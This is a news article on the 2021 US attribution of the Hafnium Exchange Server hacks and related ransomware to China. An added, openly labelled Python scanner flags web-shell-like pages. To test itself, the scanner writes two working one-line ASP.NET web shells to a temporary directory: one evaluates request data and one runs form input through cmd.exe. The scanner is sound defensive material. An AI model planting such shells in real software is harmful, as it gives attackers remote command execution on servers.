
US Blames China for Exchange Server Hacks & Ransomware Attacks

July 19, 2021

China Accused of Large-Scale Microsoft Exchange Hack

The administration of President Biden, together with its international partners, has formally accused China of orchestrating the large-scale hacking of Microsoft Exchange servers earlier this year. The intrusions were serious enough that the FBI intervened directly, out of concern that the backdoors left behind on victim servers could be used to cause widespread damage.

Details of the Hacking Campaign

The campaign targeted on-premises Microsoft Exchange email servers and exploited four previously unknown (zero-day) vulnerabilities. Chained together, these flaws allowed the attackers, identified by Microsoft as Hafnium, a group it links to China, to read email accounts and address books at a large number of organizations across the United States.

Microsoft promptly released security updates for the four vulnerabilities, but a patch only closes the entry point: it does not remove the web shells and other malicious code the attackers had already planted on servers compromised before the update was applied. A server patched after the fact therefore remains backdoored, and that code can be used to regain access at any later time, until it is found and removed.
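As an added illustration of why a patched server can still be compromised (example code written for this edition, not from the article, from Microsoft or from the FBI): the script below walks an ASP.NET web directory and flags pages that evaluate request data or spawn processes, the shape a dropped web shell typically takes. The directory layout, file names, file contents and matching heuristics are all constructed assumptions for the example, not published indicators of compromise.

```python
"""Heuristic scan of an ASP.NET web root for web-shell-like pages.

Added example: the patterns, sample tree and file contents below are
constructed for illustration and are not a published signature set.
"""
import os
import re
import tempfile

# File types an ASP.NET web shell is usually dropped as.
WEB_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asax"}

# Assumed heuristics: a page that feeds request data into eval, starts a
# process, or loads an assembly at runtime is not normal application code.
SUSPICIOUS_PATTERNS = [
    ("eval-of-request", re.compile(r"eval\s*\(\s*Request", re.IGNORECASE)),
    ("jscript-unsafe-eval", re.compile(r'"unsafe"\s*\)', re.IGNORECASE)),
    ("process-start", re.compile(r"Process\.Start\s*\(", re.IGNORECASE)),
    ("assembly-load", re.compile(r"Assembly\.Load\s*\(", re.IGNORECASE)),
]


def scan_file(path):
    """Return the names of the heuristics that match one file ([] if clean)."""
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as fh:
            text = fh.read()
    except OSError:
        return []
    return [name for name, pattern in SUSPICIOUS_PATTERNS if pattern.search(text)]


def find_web_shells(root):
    """Walk `root` and map each suspicious web file to the heuristics it trips."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            matched = scan_file(path)
            if matched:
                hits[path] = matched
    return hits


def build_sample_tree():
    """Create a constructed directory laid out like an Exchange front-end web
    root (path assumed for the example) and return its location."""
    root = tempfile.mkdtemp(prefix="exchange-sample-")
    auth_dir = os.path.join(root, "FrontEnd", "HttpProxy", "owa", "auth")
    os.makedirs(auth_dir)
    # Constructed benign page: static markup, no evaluation of request data.
    with open(os.path.join(auth_dir, "logon.aspx"), "w", encoding="utf-8") as fh:
        fh.write('<%@ Page Language="C#" %>\n<html><body><h1>Sign in</h1></body></html>\n')
    # Constructed one-line JScript shell: evaluates whatever the client sends.
    with open(os.path.join(auth_dir, "errorFF.aspx"), "w", encoding="utf-8") as fh:
        fh.write('<script language="JScript" runat="server">'
                 'function Page_Load(){eval(Request["x"],"unsafe");}</script>\n')
    # Constructed C# shell: runs a command taken from a form field.
    with open(os.path.join(auth_dir, "help.aspx"), "w", encoding="utf-8") as fh:
        fh.write('<%@ Page Language="C#" %><%@ Import Namespace="System.Diagnostics" %>\n'
                 '<% Process.Start("cmd.exe", "/c " + Request.Form["cmd"]); %>\n')
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for hit_path, reasons in sorted(find_web_shells(sample_root).items()):
        print(f"{hit_path}: {', '.join(reasons)}")
```

On a real server the scan would be pointed at the Exchange installation's web directories rather than a temporary sample tree, and any file it flags should be compared against a known-good install before it is treated as a shell; the heuristics are deliberately broad and will also trip on legitimate administrative pages that spawn processes.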

FBI Response and International Cooperation

Consequently, the FBI obtained an unprecedented court order authorizing it to connect to hundreds of still-compromised Exchange servers in the U.S. and delete the backdoor code itself, rather than waiting for each owner to do so. Security teams in other countries likewise notified organizations within their borders that had been hit by the attack.

The Biden administration’s statement released on Monday indicated that the attack, attributed to hackers associated with China’s Ministry of State Security, resulted in “significant remediation costs for its mostly private sector victims.”

The statement further emphasized, “We have communicated our concerns regarding this incident and the [People’s Republic of China’s] wider pattern of harmful cyber activity to high-ranking PRC Government officials, making it clear that the PRC’s actions pose a threat to security, trust, and stability in cyberspace.”

NSA Support and Allied Backing

To aid network defenders, the National Security Agency also published detailed information about the attacks, outlining potential compromise pathways.

Several allies, including the United Kingdom and NATO member states, publicly supported the Biden administration’s conclusions. The U.K. government specifically identified Beijing as responsible for a “pervasive pattern” of hacking activities. The Chinese government continues to deny any involvement in state-sponsored hacking.

China's Alleged Ties to Criminal Hackers

The Biden administration also alleges that China’s Ministry of State Security has contracted with cybercriminals to carry out illicit operations, such as ransomware attacks, “for their own financial gain.” It is reported that these China-linked hackers have demanded millions of dollars in ransom from compromised companies.

Last year, the Justice Department indicted two Chinese hackers said to have worked with the Ministry of State Security for their role in a global hacking campaign, alleging that they also operated for personal enrichment.

While the U.S. has previously engaged with the Kremlin to discourage the provision of safe harbor for ransomware groups operating within Russia, this marks the first time Beijing has been directly accused of launching or participating in ransomware attacks.

“The PRC’s failure to address criminal activity conducted by contracted hackers inflicts harm on governments, businesses, and critical infrastructure, resulting in billions of dollars in losses due to stolen intellectual property, confidential data, ransom payments, and mitigation expenses,” the statement declared.

Additional Malicious Activities

The statement also detailed that the China-backed hackers engaged in extortion and cryptojacking, a practice involving the unauthorized use of a computer’s resources to mine cryptocurrency for profit.

New Indictments Announced

The Justice Department announced additional charges against four China-backed hackers affiliated with the Ministry of State Security. U.S. prosecutors allege these individuals were involved in attempts to steal intellectual property and research related to infectious diseases, including Ebola, HIV/AIDS, and MERS, from victims in the U.S., Norway, Switzerland, and the United Kingdom, utilizing a shell company to conceal their operations.

“The extensive scope and prolonged nature of China’s hacking campaigns, encompassing efforts targeting a dozen countries across diverse sectors – from healthcare and biomedical research to aviation and defense – serve as a reminder that no nation or industry is immune. Today’s international condemnation demonstrates a global desire for equitable rules, where countries prioritize innovation over theft,” stated Deputy Attorney General Lisa Monaco.
